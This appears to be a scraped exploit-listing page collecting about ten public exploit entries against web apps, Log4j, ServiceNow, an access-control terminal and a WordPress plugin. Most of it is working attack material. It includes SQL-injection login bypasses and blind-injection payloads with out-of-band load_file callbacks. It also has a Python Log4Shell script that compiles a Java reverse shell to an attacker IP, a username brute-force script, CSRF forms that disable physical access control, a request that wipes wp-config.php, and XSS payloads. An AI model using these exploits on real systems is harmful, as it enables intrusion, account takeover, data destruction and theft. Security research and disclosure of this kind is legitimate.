<pre><code># Exploit Title: Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass<br /># Date: 11/02/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15169/simple-student-quarterly-resultgrade-system-php-and-mysql-free-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Linux <br /><br /><br /><br /><br /># Vulnerable Code<br /><br />line 57 in file "/sqgs/Actions.php"<br /><br />@$check= $this->db->query("SELECT count(admin_id) as `count` FROM admin_list where `username` = '{$username}' ".($id > 0 ? " and admin_id != '{$id}' " : ""))->fetch_array()['count'];<br /><br /><br />Steps To Reproduce:<br />* - Go to the login page http://localhost/sqgs/login.php<br /><br />Payload:<br /><br />username: admin ' or '1'='1'#--<br />password: \<br /><br /><br /><br />Proof of Concept :<br /><br />POST /sqgs/Actions.php?a=login HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 51<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/sqgs/login.php<br />Cookie: PHPSESSID=v9a2mv23kc0gcj43kf6jeudk2v<br /><br />username=admin+'+or+'1'%3D'1'%23--&password=0xsaudi<br /><br /></code></pre>
<pre><code># Exploit Title: Online Thesis Archiving System 1.0 - SQLi Authentication Bypass & Stored (XSS)<br /># Exploit Author: Yehia Elghaly (YME)<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html<br /># Version: Online Thesis Archiving System 1.0<br /># Tested on: Windows, xampp<br /># CVE: N/A<br /><br />- Description:SQLi Authentication Bypass<br />SQL Injection vulnerability exists in Online Thesis Archiving System 1.0 1.0. An admin account takeover exists with the payload: admin' # - admin' or '1'='1<br /><br />PoC:<br /><br /><br />POST /otas/admin/login.php HTTP/1.1<br />Host: 192.168.113.130<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 35<br />Origin: http://192.168.113.130<br />DNT: 1<br />Connection: close<br />Referer: http://192.168.113.130/otas/admin/login.php<br />Cookie: PHPSESSID=0jsudph494kpt2a5jvbvdvsrsc<br />Upgrade-Insecure-Requests: 1<br /><br />username=admin' #&password=admin' #<br /><br />- Description: Stored Cross Site Scripting (XSS)<br />Stored Cross Site Scripting (XSS) exists in Online Thesis Archiving System 1.0. Steps: <br />1- Go to (http://localhost/otas/admin/?page=departments) and (http://localhost/otas/admin/?page=curriculum)<br />2- Add new (curriculum) or (department) <br />3- Insert your payload <script>("xssyf")</script><br /></code></pre>
February 23, 2022Online Thesis Archiving System 1.0 SQL Injection / Cross Site Scripting
by KitPloit
<pre><code>## Title: Medical Store Management System v1.0 remote SQL-Injections<br />## Author: nu11secur1ty<br />## Date: 02.16.2022<br />## Vendor: https://github.com/abhisheks008<br />## Software: https://github.com/abhisheks008/Medical-Store-Management-System<br />## CVE-Medical Store Management System v1.0<br /><br /><br />## Description:<br />The `cid` parameter fom customer-add.php app on Medical Store<br />Management System v1.0 appears to be vulnerable to SQL injection<br />attacks.<br />The application took 20034 milliseconds to respond to the request,<br />compared with 36 milliseconds for the original request, indicating<br />that the injected SQL command caused a time delay.<br />The malicious actor can take control of the system administrator<br />accounts of this system!<br />WARNING: If this is in some external domain, or some subdomain, or<br />internal, this will be extremely dangerous!<br />Status: CRITICAL<br /><br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: cid (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: cid=987101' AND (SELECT 7784 FROM (SELECT(SLEEP(3)))HbQW)<br />AND 'yDXs'='yDXs&cfname=Safia&clname=Malik&age=22'+(select<br />load_file('\\\\ej12det210osu6x32wsqrnyu6lce080wrzfr2kq9.https://github.com/abhisheks008/Medical-Store-Management-System\\tah'))+'&sex=Female&phno=9632587415&emid=safia@gmail.com&update=Update<br />---<br /><br />```<br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/abhisheks008/2022/Medical-Store-Management-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/p97tbi)<br /><br /></code></pre>
<pre><code># Exploit Title: Apache Log4j 2 - Remote Code Execution (RCE)<br /># Date: 11/12/2021<br /># Exploit Authors: kozmer, z9fr, svmorris<br /># Vendor Homepage: https://logging.apache.org/log4j/2.x/<br /># Software Link: https://github.com/apache/logging-log4j2<br /># Version: versions 2.0-beta-9 and 2.14.1.<br /># Tested on: Linux<br /># CVE: CVE-2021-44228<br /># Github repo: https://github.com/kozmer/log4j-shell-poc<br /><br />import subprocess<br />import os<br />import sys<br /><br />javaver = subprocess.call(['./jdk1.8.0_20/bin/java', '-version']) #stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)<br />print("\n")<br /><br />userip = input("[+] Enter IP for LDAPRefServer & Shell: ")<br />userport = input("[+] Enter listener port for LDAPRefServer: ")<br />lport = input("[+] Set listener port for shell: ")<br /><br />def payload():<br /><br /> javapayload = ("""<br /><br />import java.io.IOException;<br />import java.io.InputStream;<br />import java.io.OutputStream;<br />import java.net.Socket;<br /><br />public class Exploit {<br /><br /> public Exploit() throws Exception {<br /> String host="%s";<br /> int port=%s;<br /> String cmd="/bin/sh";<br /> Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();<br /> Socket s=new Socket(host,port);<br /> InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();<br /> OutputStream po=p.getOutputStream(),so=s.getOutputStream();<br /> while(!s.isClosed()) {<br /> while(pi.available()>0)<br /> so.write(pi.read());<br /> while(pe.available()>0)<br /> so.write(pe.read());<br /> while(si.available()>0)<br /> po.write(si.read());<br /> so.flush();<br /> po.flush();<br /> Thread.sleep(50);<br /> try {<br /> p.exitValue();<br /> break;<br /> }<br /> catch (Exception e){<br /> }<br /> };<br /> p.destroy();<br /> s.close();<br /> }<br />}<br /><br />""") % (userip,lport)<br /><br /> f = open("Exploit.java", "w")<br /> f.write(javapayload)<br /> f.close()<br /><br /> os.system('./jdk1.8.0_20/bin/javac Exploit.java')<br /><br /> sendme = ("${jndi:ldap://%s:1389/a}") % (userip)<br /> print("[+] Send me: "+sendme+"\n")<br /><br />def marshalsec():<br /> os.system("./jdk1.8.0_20/bin/java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer<br />http://{}:{}/#Exploit".format<br />(userip, userport))<br /><br />if __name__== "__main__":<br /> payload()<br /> marshalsec()<br /> <br /></code></pre>
<pre><code># Exploit Title: ServiceNow - Username Enumeration<br /># Google Dork: NA<br /># Date: 12 February 2022<br /># Exploit Author: Victor Hanna (Trustwave SpiderLabs)<br /># Author Github Page: https://9lyph.github.io/CVE-2021-45901/<br /># Vendor Homepage: https://www.servicenow.com/<br /># Software Link: https://docs.servicenow.com/bundle/orlando-servicenow-platform/page/product/mid-server/task/t_DownloadMIDServerFiles.html<br /># Version: Orlando<br /># Tested on: MAC OSX<br /># CVE : CVE-2021-45901<br /><br />#!/usr/local/bin/python3<br /># Author: Victor Hanna (SpiderLabs)<br /># User enumeration script SNOW<br /># Requires valid 1. JSESSION (anonymous), 2. X-UserToken and 3. CSRF Token<br /><br />import requests<br />import re<br />import urllib.parse<br />from colorama import init<br />from colorama import Fore, Back, Style<br />import sys<br />import os<br />import time<br /><br />from urllib3.exceptions import InsecureRequestWarning<br />requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)<br /><br />def banner():<br /> print ("[+]********************************************************************************[+]")<br /> print ("| Author : Victor Hanna (9lyph)["+Fore.RED + "SpiderLabs" +Style.RESET_ALL+"]\t\t\t\t\t |")<br /> print ("| Decription: SNOW Username Enumerator |")<br /> print ("| Usage : "+sys.argv[0]+" |")<br /> print ("| Prequisite: \'users.txt\' needs to contain list of users |") <br /> print ("[+]********************************************************************************[+]")<br /><br />def main():<br /> os.system('clear')<br /> banner()<br /> proxies = {<br /> "http":"http://127.0.0.1:8080/",<br /> "https":"http://127.0.0.1:8080/"<br /> }<br /> url = "http://<redacted>/"<br /> try:<br /> # s = requests.Session()<br /> # s.verify = False<br /> r = requests.get(url, timeout=10, verify=False, proxies=proxies)<br /> JSESSIONID = r.cookies["JSESSIONID"]<br /> glide_user_route = r.cookies["glide_user_route"]<br /> startTime = (str(time.time_ns()))<br /> # print (startTime[:-6])<br /> except requests.exceptions.Timeout:<br /> print ("[!] Connection to host timed out !")<br /> sys.exit(1)<br /> except requests.exceptions.ProxyError:<br /> print ("[!] Can't communicate with proxy !")<br /> sys.exit(1)<br /><br /> with open ("users.txt", "r") as f:<br /> usernames = f.readlines()<br /> print (f"[+] Brute forcing ....")<br /> for users in usernames:<br /> url = "http://<redacted>/$pwd_reset.do?sysparm_url=ss_default"<br /> headers1 = {<br /> "Host": "<redacted>",<br /> "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0",<br /> "Accept": "*/*",<br /> "Accept-Language": "en-US,en;q=0.5",<br /> "Accept-Encoding": "gzip, deflate",<br /> "Connection": "close",<br /> "Cookie": "glide_user_route="+glide_user_route+"; JSESSIONID="+JSESSIONID+"; __CJ_g_startTime=\'"+startTime[:-6]+"\'"<br /> }<br /><br /> try:<br /> # s = requests.Session()<br /> # s.verify = False<br /> r = requests.get(url, headers=headers1, timeout=20, verify=False, proxies=proxies)<br /> obj1 = re.findall(r"pwd_csrf_token", r.text)<br /> obj2 = re.findall(r"fireAll\(\"ck_updated\"", r.text)<br /> tokenIndex = (r.text.index(obj1[0]))<br /> startTime2 = (str(time.time_ns()))<br /> # userTokenIndex = (r.text.index(obj2[0]))<br /> # userToken = (r.text[userTokenIndex+23 : userTokenIndex+95])<br /> token = (r.text[tokenIndex+45:tokenIndex+73])<br /> url = "http://<redacted>/xmlhttp.do"<br /> headers2 = {<br /> "Host": "<redacted>",<br /> "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0",<br /> "Accept": "*/*",<br /> "Accept-Language": "en-US,en;q=0.5",<br /> "Accept-Encoding": "gzip, deflate",<br /> "Referer": "http://<redacted>/$pwd_reset.do?sysparm_url=ss default",<br /> "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",<br /> "Content-Length": "786",<br /> "Origin": "http://<redacted>/",<br /> "Connection": "keep-alive",<br /> # "X-UserToken":""+userToken+"",<br /> "Cookie": "glide_user_route="+glide_user_route+";JSESSIONID="+JSESSIONID+"; __CJ_g_startTime=\'"+startTime2[:-6]+"\'"<br /> }<br /><br /> data = {<br /> "sysparm_processor": "PwdAjaxVerifyIdentity",<br /> "sysparm_scope": "global",<br /> "sysparm_want_session_messages": "true",<br /> "sysparm_name":"verifyIdentity",<br /> "sysparm_process_id":"c6b0c20667100200a5a0f3b457415ad5",<br /> "sysparm_processor_id_0":"fb9b36b3bf220100710071a7bf07390b",<br /> "sysparm_user_id_0":""+users.strip()+"",<br /> "sysparm_identification_number":"1",<br /> "sysparam_pwd_csrf_token":""+token+"",<br /> "ni.nolog.x_referer":"ignore",<br /> "x_referer":"$pwd_reset.do?sysparm_url=ss_default"<br /> }<br /><br /> payload_str = urllib.parse.urlencode(data, safe=":+")<br /><br /> except requests.exceptions.Timeout:<br /> print ("[!] Connection to host timed out !")<br /> sys.exit(1)<br /><br /> try:<br /> # s = requests.Session()<br /> # s.verify = False<br /> time.sleep(2)<br /> r = requests.post(url, headers=headers2, data=payload_str, timeout=20, verify=False, proxies=proxies)<br /> if "500" in r.text:<br /> print (Fore.RED + f"[-] Invalid user: {users.strip()}" + Style.RESET_ALL)<br /> f = open("enumeratedUserList.txt", "a+")<br /> f.write(Fore.RED + f"[-] Invalid user: {users.strip()}\n" + Style.RESET_ALL)<br /> f.close()<br /> elif "200" in r.text:<br /> print (Fore.GREEN + f"[+] Valid user: {users.strip()}" + Style.RESET_ALL)<br /> f = open("enumeratedUserList.txt", "a+")<br /> f.write(Fore.GREEN + f"[+] Valid user: {users.strip()}\n" + Style.RESET_ALL)<br /> f.close()<br /> else:<br /> print (Fore.RED + f"[-] Invalid user: {users.strip()}" + Style.RESET_ALL)<br /> f = open("enumeratedUserList.txt", "a+")<br /> f.write(Fore.RED + f"[-] Invalid user: {users.strip()}\n" + Style.RESET_ALL)<br /> f.close()<br /> except KeyboardInterrupt:<br /> sys.exit()<br /> except requests.exceptions.Timeout:<br /> print ("[!] Connection to host timed out !")<br /> sys.exit(1)<br /> except Exception as e:<br /> print (Fore.RED + f"Unable to connect to host" + Style.RESET_ALL)<br /><br />if __name__ == "__main__":<br /> main ()<br /> <br /></code></pre>
<pre><code>## Title: Ticket Booking 1.0 suffer from SQL - Injenction<br />## Author: nu11secur1ty<br />## Date: 12.14.2021<br />## Vendor: https://code-projects.org/ticket-booking-in-php-with-source-code/<br />## Software: https://code-projects.org/ticket-booking-in-php-with-source-code/<br /><br />## Description:<br />The password parameter appears to be vulnerable to SQL injection<br />attacks. The payload '+(select<br />load_file('\\\\dl2edbuqvk9djxngyslxk9z7hynrbqzh25uslga.nu11secur1tyPenetrationTestingEngineer.net\\yba'))+'<br />was submitted in the password parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed. The attacker can be retrieving all<br />information from this system.<br /><br />[+] Payload:<br /><br />Parameter: email (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)<br /> Payload: email=-9424' OR 1979=1979#&password=hacked' or<br />'4861'='4870&login_submit=<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: email=pwned@nu11secur1tyPenetrationTestingEngineer.net'<br />OR (SELECT 3647 FROM(SELECT COUNT(*),CONCAT(0x717a6b7a71,(SELECT<br />(ELT(3647=3647,1))),0x71716a7a71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- RnIV&password=hacked' or<br />'4861'='4870&login_submit=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: email=pwned@nu11secur1tyPenetrationTestingEngineer.net'<br />AND (SELECT 2804 FROM (SELECT(SLEEP(5)))urgo)-- taiV&password=hacked'<br />or '4861'='4870&login_submit=<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 7 columns<br /> Payload: email=pwned@nu11secur1tyPenetrationTestingEngineer.net'<br />UNION ALL SELECT<br />NULL,CONCAT(0x717a6b7a71,0x5379666f7a4b7256695768444c63617a724465514467724f4c59744a4d574a6d4c697974424d4c47,0x71716a7a71),NULL,NULL,NULL,NULL,NULL#&password=hacked'<br />or '4861'='4870&login_submit=<br /><br />## Reproduce:<br />[href]()<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/vtr95i)<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code># Exploit Title: Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path<br /># Discovery by: Luis Martinez<br /># Discovery Date: 2022-02-13<br /># Vendor Homepage: https://www.emerson.com/en-us<br /># Software Link : https://www.opertek.com/descargar-software/?prc=_326<br /># Tested Version: 9.80 Build 8695<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on OS: Windows 10 Pro x64 es<br /><br /># Step to discover Unquoted Service Path: <br /><br />C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "TrapiServer" |findstr /i /v """<br /><br />Trapi File Server TrapiServer C:\Program Files (x86)\Emerson\PAC Machine Edition\Common\Components\NT\trapiserver.exe Auto <br /><br /><br /># Service info:<br /><br />C:\>sc qc TrapiServer<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: TrapiServer<br /> TYPE : 120 WIN32_SHARE_PROCESS (interactive)<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\Emerson\PAC Machine Edition\Common\Components\NT\trapiserver.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Trapi File Server<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />#Exploit:<br /><br />A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.<br /><br /></code></pre>
<pre><code><!--<br /><br />Zucchetti Axess CLOKI Access Control 1.64 CSRF Disable Access Control<br /><br /><br />Vendor: Zucchetti Axess S.p.A.<br />Product web page: https://www.axesstmc.com<br />Affected version: 1.64<br /> 1.63<br /> 1.54<br /><br /><br />Summary: CLOKI is the pre-installed application on our terminals that<br />provides simple to use access control management and attendance monitoring<br />using any browser (IE, Chrome, Firefox, etc.). It is suited for anyone<br />looking for a stand-alone Access Control and Attendance Monitoring system<br />where the users' data is not frequently changed. Data management is simple<br />and intuitive and no additional software is needed on the PC intend to use<br />as WEB base. CLOKI for Access Control also allows configuration and monitoring<br />of access at all company entrances (doors, gates, turnstiles etc). The Access<br />Control manages any type of reader, entrance and access credential. Using an<br />impartial selector it is possible to check that employees do not take company<br />assets and allows registration of all accesses to the system and all operations<br />that users carry out.<br /><br />Desc: The application interface allows users to perform certain actions via HTTP<br />requests without performing any validity checks to verify the requests. These<br />actions can be exploited to perform authentication detriment and account password<br />change with administrative privileges if a logged-in user visits a malicious web<br />site.<br /><br />Tested on: Start X3 (h02 build 4163)<br /> Start X1 (g01 build 2804)<br /> X1/X2/X3/X4/X7 Web Server<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2021-5689<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5689.php<br /><br /><br />13.11.2021<br /><br />--><br /><br /><br />CSRF disable AC:<br />----------------<br /><html><br /> <body><br /> <form action="http://10.0.0.2:8081/redirect.cgi"><br /> <input type="hidden" name="flagAccessControlChanged" value="true" /><br /> <input type="hidden" name="RAct" value="5" /><br /> <input type="hidden" name="EnR" value="1" /><br /> <input type="hidden" name="ExR" value="1" /><br /> <input type="hidden" name="DenyRTout" value="5" /><br /> <input type="hidden" name="DenyR" value="0" /><br /> <input type="hidden" name="IType" value="0" /><br /> <input type="hidden" name="E485" value="on" /><br /> <input type="hidden" name="GType" value="0" /><br /> <input type="hidden" name="TOO" value="50" /><br /> <input type="hidden" name="TOC" value="50" /><br /> <input type="hidden" name="TOOE" value="100" /><br /> <input type="hidden" name="TOCE" value="100" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br /><br /><br />CSRF enable AC:<br />---------------<br /><html><br /> <body><br /> <form action="http://10.0.0.2:8081/redirect.cgi"><br /> <input type="hidden" name="flagAccessControlChanged" value="true" /><br /> <input type="hidden" name="ACtrl" value="on" /><br /> <input type="hidden" name="RAct" value="5" /><br /> <input type="hidden" name="EnR" value="1" /><br /> <input type="hidden" name="ExR" value="1" /><br /> <input type="hidden" name="DenyRTout" value="5" /><br /> <input type="hidden" name="DenyR" value="0" /><br /> <input type="hidden" name="IType" value="0" /><br /> <input type="hidden" name="E485" value="on" /><br /> <input type="hidden" name="GType" value="0" /><br /> <input type="hidden" name="TOO" value="50" /><br /> <input type="hidden" name="TOC" value="50" /><br /> <input type="hidden" name="TOOE" value="100" /><br /> <input type="hidden" name="TOCE" value="100" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)<br /># Date: 09-11-2021<br /># Exploit Author: Ceylan Bozogullarindan<br /># Exploit Website: https://bozogullarindan.com<br /># Vendor Homepage: https://bestwebsoft.com/<br /># Software Link: https://bestwebsoft.com/products/wordpress/plugins/error-log-viewer/<br /># Version: 1.1.1<br /># Tested on: Linux<br /># CVE: CVE-2021-24966 (https://wpscan.com/vulnerability/166a4f88-4f0c-4bf4-b624-5e6a02e21fa0)<br /><br /><br /># Description:<br /><br />Error Log Viewer is a simple utility plugin that helps to find and view log files with errors right from the WordPress admin dashboard. Get access to all log files from one place. View the latest activity, select logs by date, view a full log file or clear a log file!<br /><br />I've especially emphasized "clearing a log file" statement because the feature of "clearing a log file" can be used to delete an arbitrary file in a Wordpress web site. The reason of the vulnerability is that, the value of a file path which is going to be deleted is not properly and sufficiently controlled. Name of the parameter leading to the vulnerability is "rrrlgvwr_clear_file_name". It can be manipulated only authenticated users.<br /><br />An attacker can use this vulnerability; to destroy the web site by deleting wp-config.php file, or to cover the fingerprints by clearing related log files.<br /><br /># Steps To Reproduce<br /><br />1. Install and activate the plugin.<br />2. Click the "Log Monitor" available under Error Log Viewer menu item.<br />3. Choose a log file to clear.<br />4. Intercept the request via Burp or any other local proxy tool.<br />5. Replace the value of the parameter "rrrlgvwr_clear_file_name" with a file path which is going to be cleared, such as /var/www/html/wp-config.php.<br />6. Check the content of the cleared file. You will see that the file is empty.<br /><br /><br /># PoC - Supported Materials<br /><br />---------------------------------------------------------------------------<br />POST /wp-admin/admin.php?page=rrrlgvwr-monitor.php HTTP/1.1<br />Host: 127.0.0.1:8000<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 603<br />Connection: close<br />Upgrade-Insecure-Requests: 1<br />Cookie: [admin+]<br /><br />rrrlgvwr_select_log=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Flearnpress%2Finc%2Fgateways%2Fpaypal%2Fpaypal-ipn%2Fipn_errors.log&rrrlgvwr_lines_count=10&rrrlgvwr_from=&rrrlgvwr_to=&rrrlgvwr_show_content=all&rrrlgvwr_newcontent=%5B05-Feb-2015+07%3A28%3A49+UTC%5D+Invalid+HTTP+request+method.%0D%0A%0D%0A++++++++++++++++++++++++&rrrlgvwr_clear_file=Clear+log+file&rrrlgvwr_clear_file_name=/var/www/html/wp-config.php&rrrlgvwr_nonce_name=1283d54cc5&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Drrrlgvwr-monitor.php<br />---------------------------------------------------------------------------<br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20211213-0 ><br />=======================================================================<br /> title: Multiple vulnerabilities<br /> product: AbanteCart e-commerce platform<br /> vulnerable version: <1.3.2<br /> fixed version: 1.3.2<br /> CVE number: CVE-2021-42050, CVE-2021-42051<br /> impact: Medium<br /> homepage: https://www.abantecart.com<br /> found: 2021-07-19<br /> by: Daniel Teo (Office SG)<br /> Ian Chong (Office SG)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"The meaning of the word 'abante' is to move forward or lead.<br />AbanteCart community stand behind exceptional work quality and dedication to<br />creating outstanding eCommerce software services. Our inspiration comes from<br />the developers that like developing with AbanteCart and constantly work to<br />expand and keep this project alive."<br /><br />Source: https://www.abantecart.com<br /><br /><br />Business recommendation:<br />------------------------<br />SEC Consult recommends all companies who are using the AbanteCart software, to<br />upgrade to the latest version which is available at the vendor's official<br />website.<br /><br />An in-depth security analysis performed by security professionals is highly<br />advised, as the software may be affected from further security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Unrestricted File Upload (CVE-2021-42051)<br />Any low privileged user with file upload permissions can upload malicious SVG<br />files that contain a JavaScript payload.<br /><br />By proceeding to the SVG file location, the payload will be executed on the<br />client-side.<br /><br /><br />2) DOM Based Cross-Site Scripting (CVE-2021-42050)<br />DOM Based XSS is an XSS attack wherein the attack payload is executed as a<br />result of modifying the DOM "environment" in the victim's browser used by the<br />original client-side script, so that the client-side code runs in an<br />"unexpected" manner.<br /><br />The application was found to have a cross-site scripting vulnerability where<br />user supplied input is directly reflected in the Document Object Model, leading to<br />execution of arbitrary code. The vulnerable location is an input form which<br />allows users to perform search actions.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Unrestricted File Upload (CVE-2021-42051)<br /><br />A PoC SVG file can be created as follows:<br /><br />* ************************************************************************** *<br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"<br />"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <rect width="300" height="100" style="fill:rgb(0,0,255);<br />stroke-width:3;stroke:rgb(0,0,0)" /><br /> <script type="text/javascript"><br /> alert("sectest XSS");<br /> </script><br /></svg><br />* ************************************************************************** *<br /><br />2) DOM Based Cross-Site Scripting (CVE-2021-42050)<br /><br />A payload was used in the search engine:<br /><br />* ************************************************************************** *<br /><script>alert(document.domain)</script><br />* ************************************************************************** *<br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following product version has been tested which was the latest version available<br />during the time of the test:<br />* v1.3.0<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2021-08-16: Contacting vendor through help@abantecart.com<br />2021-08-27: Vendor responded and indicated that the AbanteCart team have<br /> scheduled a release on 25 September 2021 to address the issues.<br />2021-12-07: Multiple emails to check with the vendor on the release date.<br /> However, no response from the AbanteCart team but noticed that<br /> they had released the new version on 26 Nov 2021.<br />2021-12-13: Release of security advisory<br /><br /><br />Solution:<br />---------<br />Upgrade to the latest version available v1.3.2 at the vendor's download page:<br />https://www.abantecart.com/download<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Daniel Teo, Ian Chong / @2021<br /><br /><br /></code></pre>
Archives
Categories
- All Exploits 4087
- Remote Code Execution
- SQL Injection
- Command Injection
- Local File Inclusion
- Cross Site Scripting
- Privilege Escalation
- Denial Of Service
- Authentication Bypass
- Buffer Overflow